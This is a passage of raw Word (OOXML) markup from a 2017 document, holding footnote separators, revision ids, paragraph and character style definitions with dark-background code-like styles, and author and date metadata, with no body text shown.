  <w:p w14:paraId="78E7312E" w14:textId="77777777" w:rsidR="006F3040" w:rsidRDefault="006F304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481D5" w14:textId="77777777" w:rsidR="00BA30DF" w:rsidRDefault="00BA30DF" w:rsidP="006F3040">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C983A62" w14:textId="77777777" w:rsidR="00BA30DF" w:rsidRDefault="00BA30DF" w:rsidP="006F30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26"/>
    <w:rsid w:val="00095EC7"/>
    <w:rsid w:val="001217AF"/>
    <w:rsid w:val="001A137A"/>
    <w:rsid w:val="001A3CEB"/>
    <w:rsid w:val="00264426"/>
    <w:rsid w:val="00296C68"/>
    <w:rsid w:val="0031550D"/>
    <w:rsid w:val="0035387B"/>
    <w:rsid w:val="00377AAF"/>
    <w:rsid w:val="004B2800"/>
    <w:rsid w:val="00685CF6"/>
    <w:rsid w:val="006F3040"/>
    <w:rsid w:val="00713D6C"/>
    <w:rsid w:val="0071781A"/>
    <w:rsid w:val="007937D8"/>
    <w:rsid w:val="007E7463"/>
    <w:rsid w:val="009F2006"/>
    <w:rsid w:val="00BA30DF"/>
    <w:rsid w:val="00C90DC2"/>
    <w:rsid w:val="00F11467"/>
    <w:rsid w:val="00FC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3AB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3040"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FC538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426"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DateChar">
    <w:name w:val="Date Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Date"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00264426"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC538D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C538D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="op">
    <w:name w:val="op"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FC538D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FC538D"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLVariable">
    <w:name w:val="HTML Variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC538D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C90DC2"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C90DC2"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="FF9A2E"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C90DC2"/>
    <w:rPr>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s3">
    <w:name w:val="s3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C90DC2"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s4">
    <w:name w:val="s4"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C90DC2"/>
    <w:rPr>
      <w:color w:val="FF9A2E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s5">
    <w:name w:val="s5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C90DC2"/>
    <w:rPr>
      <w:color w:val="FF9A2E"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00C90DC2"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p3">
    <w:name w:val="p3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00377AAF"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="FF9A2E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6F30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040"/>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F3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8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1557</Words>
  <Characters>8875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Dongqi Guo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dongqi Guo</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-31T15:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-01T03:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>